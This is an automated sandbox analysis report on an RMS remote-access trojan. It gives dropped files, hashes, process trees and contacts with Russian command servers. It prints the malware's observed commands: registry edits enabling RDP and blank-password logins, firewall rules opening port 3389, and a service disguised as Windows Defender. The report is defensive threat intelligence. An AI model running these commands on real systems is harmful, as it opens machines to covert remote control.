Malware Analysis Report

2024-11-30 19:53

Sample ID 220213-lrt7kaaeap
Target d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c
SHA256 d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c
Tags
rms evasion persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c

Threat Level: Known bad

The file d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c was found to be: Known bad.

Malicious Activity Summary

rms evasion persistence rat trojan upx

RMS

Executes dropped EXE

Modifies Windows Firewall

UPX packed file

Sets DLL path for service in the registry

Allows Network login with blank passwords

Loads dropped DLL

Modifies WinLogon

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: SetClipboardViewer

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-13 09:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-13 09:46

Reported

2022-02-13 09:49

Platform

win7-en-20211208

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

Signatures

RMS

trojan rat rms

Modifies Windows Firewall

evasion

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Allows Network login with blank passwords

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\limitblankpassworduse = "0" C:\Windows\SysWOW64\reg.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\Windows\RDPWInst.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\CardWindows\vp8decoder.dll C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\RDPWInst.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\RDPWInst.exe N/A
File created C:\Program Files\CardWindows\SystemDrvs.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\regedit.reg C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\vp8encoder.dll C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\service.bat C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\sys.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A
File created C:\Program Files\CardWindows\MSIDrvs.exe C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RDPSetup.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPWInst.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.bat C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPCheck.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPConf.exe C:\Program Files\CardWindows\sys.exe N/A

Launches sc.exe

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Windows\RDPWInst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob removed] C:\Windows\RDPWInst.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: LoadsDriver


Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\SystemDrvs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\RDPWInst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1600 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1048 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2020 wrote to memory of 1232 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1600 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 1748 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1748 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 1048 wrote to memory of 1072 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Program Files\CardWindows\\regedit.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "regedit.reg"

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /silentinstall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /firewall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /start

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\MSIDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Program Files\CardWindows\sys.exe

"C:\Program Files\CardWindows\\sys.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows/run.bat

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files\CardWindows\\service.bat""

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions=restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Windows_Defender v6.3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

memory/1600-54-0x0000000075601000-0x0000000075603000-memory.dmp

C:\Program Files\CardWindows\regedit.reg

MD5 06c5938fae635bb8ce25794b720d792b
SHA1 bedbcddd59e5648543b53d0d66b643a2d26cb262
SHA256 bfd56a7929f620d054ae39a4815632934af9ce91810190ecc02c0381e61bdd5f
SHA512 befab3eddba41837c4e16000580e159934829a99827b03e382bea6a01cd5503a3f8b82746c0e9902b760dc8ab308dfa19fd7e8503d631acead4c9454c728d9fa

\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\vp8decoder.dll

MD5 d43fa82fab5337ce20ad14650085c5d9
SHA1 678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256 c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512 103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\vp8encoder.dll

MD5 dab4646806dfca6d0e0b4d80fa9209d6
SHA1 8244dfe22ec2090eee89dad103e6b2002059d16a
SHA256 cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512 aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

memory/2020-72-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/916-71-0x0000000000230000-0x0000000000231000-memory.dmp

\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

memory/1680-82-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1680-85-0x0000000000401000-0x0000000000797000-memory.dmp

memory/1232-86-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1048-88-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1680-89-0x0000000000370000-0x0000000000373000-memory.dmp

memory/1680-90-0x0000000000360000-0x0000000000366000-memory.dmp

memory/1680-91-0x00000000002D0000-0x000000000031B000-memory.dmp

C:\Windows\run.bat

MD5 93a098e3701bf40042a0e51d3a125b31
SHA1 2dcbf75b8d8bba7830aa363c1e56560e552c726a
SHA256 8a0c16ab6f2b5af74b62fe041b8bc1ddf8dc03fb713c5bb30beceba307bb1269
SHA512 06d97a68fc971bc5c739f5da10a172c2279b9158b994d78b7eb60fff6e484c118b70631df788557a213f26baae00cde9ed7e176b1495c5d2ec74099a7fa3fa12

memory/1680-93-0x000000007EFA0000-0x000000007EFA1000-memory.dmp

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

\Program Files\RDP Wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

memory/1108-101-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

C:\Program Files\RDP Wrapper\rdpwrap.ini

MD5 dddd741ab677bdac8dcd4fa0dda05da2
SHA1 69d328c70046029a1866fd440c3e4a63563200f9
SHA256 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA512 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

MD5 8781fe5562b050b7112db570d6104140
SHA1 f566841fa04fbb13d1a505a1dcfd1040fef87203
SHA256 9647145d4205efe8a2b114d27070c81d147eeb42eed917495a97c9ce96540bdc
SHA512 cef13a45244f5d8d9285a7b797ff7b73155e034628d0eab81163de2c175a759ddf36d2060f5dffee499778d0be1059c1f0e9305a38f47457886b289f6275f272

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

MD5 a8cece8975329aad2549d1f73ab385e8
SHA1 02f2247f70d2765756df2d084508e0a96e567cfa
SHA256 7d9b6778d972fbb7a92bd5e0f65eea87182d2a74aa66fa234a4063441c05e395
SHA512 c55fed606f1788c8ac7c5389ea3bd0bf3a3b5ffed0c0e8ceb6dff3c251c1438106dbd7abaa7417c54a1b33efd2fb12155facd7d289af9a8b3995e7918efc811e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c92647e39d2657bb568f6781875d7268
SHA1 4db1eea108282a9e4687dedf6160586e9dae1b62
SHA256 1b570cfc56aec0e1f8dd793bc8cce8686ef8f4dfb6e3506c7e7e0b6f0bfb4780
SHA512 d7c4b6e023f817ba00fd3fd83a60ddd4baf16a677b55174c91936382e2bf15d38a738bc3204f39a99080da2cfcdfc4099f1089776e40025923c86dd6d71a470a

C:\Program Files\CardWindows\service.bat

MD5 d464405315d8b051c5f101a7035eff0c
SHA1 f9fefd04bb0f04d2b7fbac73efac8130a264fc6b
SHA256 e54649f33d7b149073e457e5c4b78767433b05f8220245f8ee2c7ad44685ed10
SHA512 6e0daab678a3ace2c437702241daee277d4b2bed86bf953fa33089ce3654402415d2401d15740b6ae2077289c87550f50750c0d33e415999e3df27b5fc40350a

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-13 09:46

Reported

2022-02-13 09:49

Platform

win10v2004-en-20220112

Max time kernel

162s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

Signatures

RMS

trojan rat rms

Modifies Windows Firewall

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Allows Network login with blank passwords

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\limitblankpassworduse = "0" C:\Windows\SysWOW64\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RDPCheck.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPSetup.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPWInst.exe C:\Program Files\CardWindows\sys.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File opened for modification C:\Windows\WinSxS\pending.xml C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File created C:\Windows\RDPConf.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.bat C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.exe C:\Program Files\CardWindows\sys.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat C:\Windows\System32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\MusNotifyIcon.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\MusNotifyIcon.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "6.666072" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
